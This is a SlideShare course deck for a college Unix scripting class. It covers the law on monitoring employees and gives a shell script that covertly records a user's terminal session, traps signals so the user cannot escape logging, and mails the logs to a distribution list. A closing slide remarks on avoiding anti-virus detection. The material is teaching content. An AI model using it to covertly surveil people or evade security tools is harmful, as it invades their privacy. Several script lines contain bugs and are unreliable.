SlideShare a Scribd company logo
CIS 216
        Dan Morrill
Highline Community College
 While most companies will purchase software to do keystroke
  logging sometimes based on a court order, or a request/order
  from the legal department, or other party in the company, a
  system admin will be asked to record the keystrokes of an
  employee.
 Keystroke Loggers are Illegal?
    Not Necessarily – companies can and often do keystroke log their
     employees
    Courts in some jurisdictions have declined to take the step to
     prohibit the surreptitious use of keyloggers, despite the apparent
     option to apply state legislation. This posture leaves individuals
     vulnerable to having their private information exploited by their
     employers. Given alternative methods of surveillance, lack of
     federal regulation, and advancing technology, extending state
     statutes is necessary and just. (Harvard Law, 2012)
 Keylogging - Employers sometimes install keylogging programs that
  record every single keystroke you use on your computer. This allows
  them to see everything you are typing, including your passwords. The
  Stored Communication Act and Federal Wiretap Act, along with some
  state laws may offer limited protection, but so far most employers are
  getting away with this intrusive practice.
 Email monitoring - Many companies have written policies saying the
  company can monitor your email. That means that they may look at
  your personal emails sent on company computers and devices, even if
  you used your personal email address.
 Website monitoring - Your employer is almost certainly monitoring
  your internet usage. That means if you're checking out porn
  sites, visiting YouTube, updating Facebook, or doing your holiday
  shopping, your employer will know about it. You may be violating a
  company Internet usage policy. If you aren't working the hours you're
  paid for, the employer may well discipline you for your Internet usage.
  (AOL, 2012)
 The Fourth Amendment applies whenever the
  government — whether local, state or federal —
  conducts a search or seizure. It protects you from an
  unreasonable search or seizure by any government
  official or agent, not just the police.
 The Fourth Amendment does not protect you from
  privacy invasions by people other than the
  government, even if they later hand over what they
  found to the government — unless the government
  directed them to search your things in the first place.
  (EFF, 2006)
 The most common methods used to construct
 keylogging software are as follows:
   A system hook which intercepts notification that a key
    has been pressed (installed using WinAPI
    SetWindowsHook for messages sent by the window
    procedure. It is most often written in C);
   A cyclical information keyboard request from the
    keyboard (using WinAPI Get(Async)KeyState or
    GetKeyboardState – most often written in Visual
    Basic, sometimes in Borland Delphi);
   Using a filter driver (requires specialized knowledge and
    is written in C). (SecureList, 2007)
 Declare the variables:
   log_dir=/home/
    current_user=$(whoami)
    log_time=$(date +%m%d%y%H%M%S)
    log_file="current_user$log_time"
    attempt="0"
    test_log_file="$log_file"
 Write the function:
   create_log()
    {
    while [ -e $test_log_file ] # Checks for an existing file with the
    name found in $log_file.
    do # If $log_file is found, increment by one and try again.
       attempt="$attempt+1"
       test_log_file="$log_file""_$attempt"
    done
    log_file="$test_log_file"
    touch $log_file # Once a viable filename has been found, this
    file is created.
    chmod 600 $log_file # Make $log_file writable for logging.
    }
   Do the work
       close_log()
        {
        if [ -e $log_file ] # Tests for the existence of $log_file.
        then
           echo "" >> $log_file
           echo "****************************************" >> $log_file
           echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final
        date/time entry to log
        else
           echo "Test 3b"
           echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log
        does not exist, creates log and logs failure
           echo "Created $log_file to report this error." >> $log_file
           echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file
           echo "Logfile will now close."
        fi
        chmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered
        during logging.
        kill -9 > /dev/null # Guarantees ending of this process.
        }
 Trap the users input and create the log
   trap 'close_log; exit 0' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
    18 19 20 26
    create_log
    script $log_file
    close_log
    exit
 Setup reporting via e-mail as a distro list
   LOG_MANAGER="logman"           # List to e-mail audit log
   Logman is the distro-email
 Setup the cleanup routine so no logs are left behind on the system
  being monitored
    cleanup_exit () # This will do the cleanup execute and exit function.
     {
     # This function is executed on any type of exit except of course
     # a kill -9, which cannot be trapped. The script log file is
     # e-mailed either locally or remotely and the log file is
     # compressed. The last "exit" is needed so the user does not
     # have the ability to get to the command line without logging.
     if [[ -s ${LOGDIR}/${LOGFILE} ]]
     then
        mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER 
            < ${LOGDIR}/${LOGFILE}
        compress ${LOGDIR}/${LOGFILE} 2>/dev/null
     fi
     exit
     }
 Set the exit trap
   trap 'cleanup_exit' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
    19 20 26
 Declare the variables
        TS=$(date +%m%d%y%H%M%S)               # File time stamp
        THISHOST=$(hostname|cut -f1-2 -d.)        # This is the host name of this
       machine
         LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the
       logger files
                    # automatically and also
                    # This is the path that hold to the logs
         LOGFILE=${THISHOST}.${LOGNAME}.$TS            # Creates the name of the
       log file
         touch $LOGDIR/$LOGFILE              # Creates the actual file
         set -o vi 2>/dev/null        # Previous commands recall
       # Set the command prompt
         export PS1="[THISHOST]@"'$PWD> '
 Running parameters
   chmod 774 ${LOGDIR}/${LOGFILE}        # giving full
    control/permission to for the owner & Group
               # and read and write permissons to the other.

    script ${LOGDIR}/${LOGFILE}       # Start the script
    monitoring session

    chmod 774 ${LOGDIR}/${LOGFILE} # Set permission to
    read, write and execute for the owner and group
                # and read and write permission to other.

    cleanup_exit             # Execute the cleanup and exit
    function
 There is always more than one solution
 Sometimes you need to write a key logger that is
  required for work, and you will not want to trigger an
  Anti-virus/malware response
 Be careful – this is pretty cool, but leads to liability
  work if not suffencently covered by authorization from
  management

More Related Content

What's hot (20)

PPTX
Rancher and Kubernetes Best Practices
Avinash Patil
 
PDF
Kubernetes Architecture and Introduction
Stefan Schimanski
 
PDF
How to test infrastructure code: automated testing for Terraform, Kubernetes,...
Yevgeniy Brikman
 
PDF
Embedded linux network device driver development
Amr Ali (ISTQB CTAL Full, CSM, ITIL Foundation)
 
PPTX
Containers and Docker
Damian T. Gordon
 
PPTX
Lec 01_Linux System Administration (1).pptx
ShabanaShafi3
 
PPTX
Building Repeatable Infrastructure using Terraform
Jeeva Chelladhurai
 
PDF
Docker & kubernetes
NexThoughts Technologies
 
PPTX
Docker Compose | Docker Compose Tutorial | Docker Tutorial For Beginners | De...
Simplilearn
 
PDF
Kubernetes Helm (Boulder Kubernetes Meetup, June 2016)
Matt Butcher
 
PDF
File System Hierarchy
sritolia
 
PPTX
CORBA
Mokshada Nayak
 
PDF
Introduction to CICD
Knoldus Inc.
 
PPTX
Docker and kubernetes
Dongwon Kim
 
PPTX
Azure DevOps
Michael Jesse
 
PDF
Introduction to IAC and Terraform
Venkat NaveenKashyap Devulapally
 
PPTX
Cleanroom montaser hamza iraq2016
montaser185
 
PDF
Rust: Unlocking Systems Programming
C4Media
 
PDF
CRI, OCI, and CRI-O
Che-Chia Chang
 
PDF
Terraform 0.12 + Terragrunt
Anton Babenko
 
Rancher and Kubernetes Best Practices
Avinash Patil
 
Kubernetes Architecture and Introduction
Stefan Schimanski
 
How to test infrastructure code: automated testing for Terraform, Kubernetes,...
Yevgeniy Brikman
 
Embedded linux network device driver development
Amr Ali (ISTQB CTAL Full, CSM, ITIL Foundation)
 
Containers and Docker
Damian T. Gordon
 
Lec 01_Linux System Administration (1).pptx
ShabanaShafi3
 
Building Repeatable Infrastructure using Terraform
Jeeva Chelladhurai
 
Docker & kubernetes
NexThoughts Technologies
 
Docker Compose | Docker Compose Tutorial | Docker Tutorial For Beginners | De...
Simplilearn
 
Kubernetes Helm (Boulder Kubernetes Meetup, June 2016)
Matt Butcher
 
File System Hierarchy
sritolia
 
Introduction to CICD
Knoldus Inc.
 
Docker and kubernetes
Dongwon Kim
 
Azure DevOps
Michael Jesse
 
Introduction to IAC and Terraform
Venkat NaveenKashyap Devulapally
 
Cleanroom montaser hamza iraq2016
montaser185
 
Rust: Unlocking Systems Programming
C4Media
 
CRI, OCI, and CRI-O
Che-Chia Chang
 
Terraform 0.12 + Terragrunt
Anton Babenko
 

Viewers also liked (8)

PPTX
Process monitoring in UNIX shell scripting
Dan Morrill
 
PDF
Understanding Keylogger
Phannarith Ou, G-CISO
 
PPTX
KeySens: Passive User Authentication Through Micro Behavior Modeling of Soft ...
Jiang Zhu
 
PPTX
Linux MMAP & Ioremap introduction
Gene Chang
 
PPT
Chapters 3 4
sakshi_20
 
PDF
We Know Your Type
CTIN
 
PPTX
Keystroke dynamics
Tushar Kayande
 
PDF
researchpaper-Keystroke-Dynamics-Authentication-based-on-Principal-Component-...
Mina Khidhir
 
Process monitoring in UNIX shell scripting
Dan Morrill
 
Understanding Keylogger
Phannarith Ou, G-CISO
 
KeySens: Passive User Authentication Through Micro Behavior Modeling of Soft ...
Jiang Zhu
 
Linux MMAP & Ioremap introduction
Gene Chang
 
Chapters 3 4
sakshi_20
 
We Know Your Type
CTIN
 
Keystroke dynamics
Tushar Kayande
 
researchpaper-Keystroke-Dynamics-Authentication-based-on-Principal-Component-...
Mina Khidhir
 
Ad

Similar to Creating a keystroke logger in unix shell scripting (20)

PDF
linux_Commads
tastedone
 
PDF
Aucklug slides - desktop tips and tricks
Glen Ogilvie
 
PPTX
First Responders Course - Session 7 - Incident Scope Assessment [2004]
Phil Huggins FBCS CITP
 
PDF
10 awesome examples for viewing huge log files in unix
chinkshady
 
PPTX
Power of logs: practices for network security
Information Technology Society Nepal
 
PDF
Cybersecurity Ops With Bash Attack Defend And Analyze From The Command Line 1...
guhmanlosic
 
KEY
Cis222 9
Russ Ferriday
 
PDF
Elk its big log season
Eric Luellen
 
PDF
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON
 
PPT
Unix fundamentals
Dima Gomaa
 
PDF
MCLS 45 Lab Manual
Lokesh Singrol
 
PDF
Linux intermediate level
Madhavendra Dutt
 
PPT
Unix 2 en
Simonas Kareiva
 
DOC
58518522 study-aix
homeworkping3
 
PDF
Unix commands
selvamanisampath
 
PPTX
Lpt lopsa
ketancmaheshwari
 
PDF
Unit 10 investigating and managing
root_fibo
 
PPS
Ppt linux
Gurpreet Kaur
 
PDF
Ossec Lightning
wremes
 
linux_Commads
tastedone
 
Aucklug slides - desktop tips and tricks
Glen Ogilvie
 
First Responders Course - Session 7 - Incident Scope Assessment [2004]
Phil Huggins FBCS CITP
 
10 awesome examples for viewing huge log files in unix
chinkshady
 
Power of logs: practices for network security
Information Technology Society Nepal
 
Cybersecurity Ops With Bash Attack Defend And Analyze From The Command Line 1...
guhmanlosic
 
Cis222 9
Russ Ferriday
 
Elk its big log season
Eric Luellen
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON
 
Unix fundamentals
Dima Gomaa
 
MCLS 45 Lab Manual
Lokesh Singrol
 
Linux intermediate level
Madhavendra Dutt
 
Unix 2 en
Simonas Kareiva
 
58518522 study-aix
homeworkping3
 
Unix commands
selvamanisampath
 
Lpt lopsa
ketancmaheshwari
 
Unit 10 investigating and managing
root_fibo
 
Ppt linux
Gurpreet Kaur
 
Ossec Lightning
wremes
 
Ad

More from Dan Morrill (18)

PPTX
Windows power shell and active directory
Dan Morrill
 
PPTX
Windows power shell basics
Dan Morrill
 
PPTX
Understanding web site analytics
Dan Morrill
 
PPTX
Understanding UNIX CASE and TPUT
Dan Morrill
 
PPTX
Information security principles
Dan Morrill
 
PPTX
Using Regular Expressions in Grep
Dan Morrill
 
PPTX
Understanding the security_organization
Dan Morrill
 
PPTX
You should ask before copying that media
Dan Morrill
 
PPTX
Cis 216 – shell scripting
Dan Morrill
 
PPTX
Understanding advanced persistent threats (APT)
Dan Morrill
 
PPTX
AWS Hadoop and PIG and overview
Dan Morrill
 
PPTX
What is cloud computing
Dan Morrill
 
PPT
Social Media Plan for CityU of Seattle
Dan Morrill
 
PPT
BSIS Overview
Dan Morrill
 
PPT
Case Studies In Social Media Chinese
Dan Morrill
 
PPT
Case Studies In Social Media
Dan Morrill
 
PPT
Turn On Tune In Step Out
Dan Morrill
 
PPT
Technology And The Future Of Management
Dan Morrill
 
Windows power shell and active directory
Dan Morrill
 
Windows power shell basics
Dan Morrill
 
Understanding web site analytics
Dan Morrill
 
Understanding UNIX CASE and TPUT
Dan Morrill
 
Information security principles
Dan Morrill
 
Using Regular Expressions in Grep
Dan Morrill
 
Understanding the security_organization
Dan Morrill
 
You should ask before copying that media
Dan Morrill
 
Cis 216 – shell scripting
Dan Morrill
 
Understanding advanced persistent threats (APT)
Dan Morrill
 
AWS Hadoop and PIG and overview
Dan Morrill
 
What is cloud computing
Dan Morrill
 
Social Media Plan for CityU of Seattle
Dan Morrill
 
BSIS Overview
Dan Morrill
 
Case Studies In Social Media Chinese
Dan Morrill
 
Case Studies In Social Media
Dan Morrill
 
Turn On Tune In Step Out
Dan Morrill
 
Technology And The Future Of Management
Dan Morrill
 

Recently uploaded (20)

PPTX
How to Set Up Tags in Odoo 18 - Odoo Slides
Celine George
 
PDF
Exploring the Different Types of Experimental Research
Thelma Villaflores
 
PDF
0725.WHITEPAPER-UNIQUEWAYSOFPROTOTYPINGANDUXNOW.pdf
Thomas GIRARD, MA, CDP
 
PPTX
care of patient with elimination needs.pptx
Rekhanjali Gupta
 
PPTX
Identifying elements in the story. Arrange the events in the story
geraldineamahido2
 
PPTX
PPT-Q1-WEEK-3-SCIENCE-ERevised Matatag Grade 3.pptx
reijhongidayawan02
 
PPTX
How to Configure Re-Ordering From Portal in Odoo 18 Website
Celine George
 
PDF
Aprendendo Arquitetura Framework Salesforce - Dia 03
Mauricio Alexandre Silva
 
PPTX
How to Handle Salesperson Commision in Odoo 18 Sales
Celine George
 
PDF
Geographical diversity of India short notes by sandeep swamy
Sandeep Swamy
 
PPTX
PPT-Q1-WK-3-ENGLISH Revised Matatag Grade 3.pptx
reijhongidayawan02
 
PPTX
CATEGORIES OF NURSING PERSONNEL: HOSPITAL & COLLEGE
PRADEEP ABOTHU
 
PPTX
Post Dated Cheque(PDC) Management in Odoo 18
Celine George
 
PDF
Governor Josh Stein letter to NC delegation of U.S. House
Mebane Rash
 
PPTX
grade 5 lesson matatag ENGLISH 5_Q1_PPT_WEEK4.pptx
SireQuinn
 
PDF
Stokey: A Jewish Village by Rachel Kolsky
History of Stoke Newington
 
PDF
DIGESTION OF CARBOHYDRATES,PROTEINS,LIPIDS
raviralanaresh2
 
PDF
Geographical Diversity of India 100 Mcq.pdf/ 7th class new ncert /Social/Samy...
Sandeep Swamy
 
PPTX
Cultivation practice of Litchi in Nepal.pptx
UmeshTimilsina1
 
PPTX
Quarter 1_PPT_PE & HEALTH 8_WEEK 3-4.pptx
ronajadolpnhs
 
How to Set Up Tags in Odoo 18 - Odoo Slides
Celine George
 
Exploring the Different Types of Experimental Research
Thelma Villaflores
 
0725.WHITEPAPER-UNIQUEWAYSOFPROTOTYPINGANDUXNOW.pdf
Thomas GIRARD, MA, CDP
 
care of patient with elimination needs.pptx
Rekhanjali Gupta
 
Identifying elements in the story. Arrange the events in the story
geraldineamahido2
 
PPT-Q1-WEEK-3-SCIENCE-ERevised Matatag Grade 3.pptx
reijhongidayawan02
 
How to Configure Re-Ordering From Portal in Odoo 18 Website
Celine George
 
Aprendendo Arquitetura Framework Salesforce - Dia 03
Mauricio Alexandre Silva
 
How to Handle Salesperson Commision in Odoo 18 Sales
Celine George
 
Geographical diversity of India short notes by sandeep swamy
Sandeep Swamy
 
PPT-Q1-WK-3-ENGLISH Revised Matatag Grade 3.pptx
reijhongidayawan02
 
CATEGORIES OF NURSING PERSONNEL: HOSPITAL & COLLEGE
PRADEEP ABOTHU
 
Post Dated Cheque(PDC) Management in Odoo 18
Celine George
 
Governor Josh Stein letter to NC delegation of U.S. House
Mebane Rash
 
grade 5 lesson matatag ENGLISH 5_Q1_PPT_WEEK4.pptx
SireQuinn
 
Stokey: A Jewish Village by Rachel Kolsky
History of Stoke Newington
 
DIGESTION OF CARBOHYDRATES,PROTEINS,LIPIDS
raviralanaresh2
 
Geographical Diversity of India 100 Mcq.pdf/ 7th class new ncert /Social/Samy...
Sandeep Swamy
 
Cultivation practice of Litchi in Nepal.pptx
UmeshTimilsina1
 
Quarter 1_PPT_PE & HEALTH 8_WEEK 3-4.pptx
ronajadolpnhs
 

Creating a keystroke logger in unix shell scripting

  • 1. CIS 216 Dan Morrill Highline Community College
  • 2.  While most companies will purchase software to do keystroke logging sometimes based on a court order, or a request/order from the legal department, or other party in the company, a system admin will be asked to record the keystrokes of an employee.  Keystroke Loggers are Illegal?  Not Necessarily – companies can and often do keystroke log their employees  Courts in some jurisdictions have declined to take the step to prohibit the surreptitious use of keyloggers, despite the apparent option to apply state legislation. This posture leaves individuals vulnerable to having their private information exploited by their employers. Given alternative methods of surveillance, lack of federal regulation, and advancing technology, extending state statutes is necessary and just. (Harvard Law, 2012)
  • 3.  Keylogging - Employers sometimes install keylogging programs that record every single keystroke you use on your computer. This allows them to see everything you are typing, including your passwords. The Stored Communication Act and Federal Wiretap Act, along with some state laws may offer limited protection, but so far most employers are getting away with this intrusive practice.  Email monitoring - Many companies have written policies saying the company can monitor your email. That means that they may look at your personal emails sent on company computers and devices, even if you used your personal email address.  Website monitoring - Your employer is almost certainly monitoring your internet usage. That means if you're checking out porn sites, visiting YouTube, updating Facebook, or doing your holiday shopping, your employer will know about it. You may be violating a company Internet usage policy. If you aren't working the hours you're paid for, the employer may well discipline you for your Internet usage. (AOL, 2012)
  • 4.  The Fourth Amendment applies whenever the government — whether local, state or federal — conducts a search or seizure. It protects you from an unreasonable search or seizure by any government official or agent, not just the police.  The Fourth Amendment does not protect you from privacy invasions by people other than the government, even if they later hand over what they found to the government — unless the government directed them to search your things in the first place. (EFF, 2006)
  • 5.  The most common methods used to construct keylogging software are as follows:  A system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C);  A cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState – most often written in Visual Basic, sometimes in Borland Delphi);  Using a filter driver (requires specialized knowledge and is written in C). (SecureList, 2007)
  • 6.  Declare the variables:  log_dir=/home/ current_user=$(whoami) log_time=$(date +%m%d%y%H%M%S) log_file="current_user$log_time" attempt="0" test_log_file="$log_file"
  • 7.  Write the function:  create_log() { while [ -e $test_log_file ] # Checks for an existing file with the name found in $log_file. do # If $log_file is found, increment by one and try again. attempt="$attempt+1" test_log_file="$log_file""_$attempt" done log_file="$test_log_file" touch $log_file # Once a viable filename has been found, this file is created. chmod 600 $log_file # Make $log_file writable for logging. }
  • 8. Do the work  close_log() { if [ -e $log_file ] # Tests for the existence of $log_file. then echo "" >> $log_file echo "****************************************" >> $log_file echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final date/time entry to log else echo "Test 3b" echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log does not exist, creates log and logs failure echo "Created $log_file to report this error." >> $log_file echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file echo "Logfile will now close." fi chmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered during logging. kill -9 > /dev/null # Guarantees ending of this process. }
  • 9.  Trap the users input and create the log  trap 'close_log; exit 0' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26 create_log script $log_file close_log exit
  • 10.  Setup reporting via e-mail as a distro list  LOG_MANAGER="logman" # List to e-mail audit log  Logman is the distro-email
  • 11.  Setup the cleanup routine so no logs are left behind on the system being monitored  cleanup_exit () # This will do the cleanup execute and exit function. { # This function is executed on any type of exit except of course # a kill -9, which cannot be trapped. The script log file is # e-mailed either locally or remotely and the log file is # compressed. The last "exit" is needed so the user does not # have the ability to get to the command line without logging. if [[ -s ${LOGDIR}/${LOGFILE} ]] then mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER < ${LOGDIR}/${LOGFILE} compress ${LOGDIR}/${LOGFILE} 2>/dev/null fi exit }
  • 12.  Set the exit trap  trap 'cleanup_exit' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26
  • 13.  Declare the variables  TS=$(date +%m%d%y%H%M%S) # File time stamp THISHOST=$(hostname|cut -f1-2 -d.) # This is the host name of this machine LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the logger files # automatically and also # This is the path that hold to the logs LOGFILE=${THISHOST}.${LOGNAME}.$TS # Creates the name of the log file touch $LOGDIR/$LOGFILE # Creates the actual file set -o vi 2>/dev/null # Previous commands recall # Set the command prompt export PS1="[THISHOST]@"'$PWD> '
  • 14.  Running parameters  chmod 774 ${LOGDIR}/${LOGFILE} # giving full control/permission to for the owner & Group # and read and write permissons to the other. script ${LOGDIR}/${LOGFILE} # Start the script monitoring session chmod 774 ${LOGDIR}/${LOGFILE} # Set permission to read, write and execute for the owner and group # and read and write permission to other. cleanup_exit # Execute the cleanup and exit function
  • 15.  There is always more than one solution  Sometimes you need to write a key logger that is required for work, and you will not want to trigger an Anti-virus/malware response  Be careful – this is pretty cool, but leads to liability work if not suffencently covered by authorization from management

Editor's Notes

  • #3: http://jolt.law.harvard.edu/digest/software/federal-and-state-wiretap-act-regulation-of-keyloggers-in-the-workplace
  • #4: http://jobs.aol.com/articles/2012/12/09/employer-spy-workers-legally-snoop/
  • #5: https://ssd.eff.org/book/export/html/16
  • #6: http://www.securelist.com/en/analysis?pubid=204791931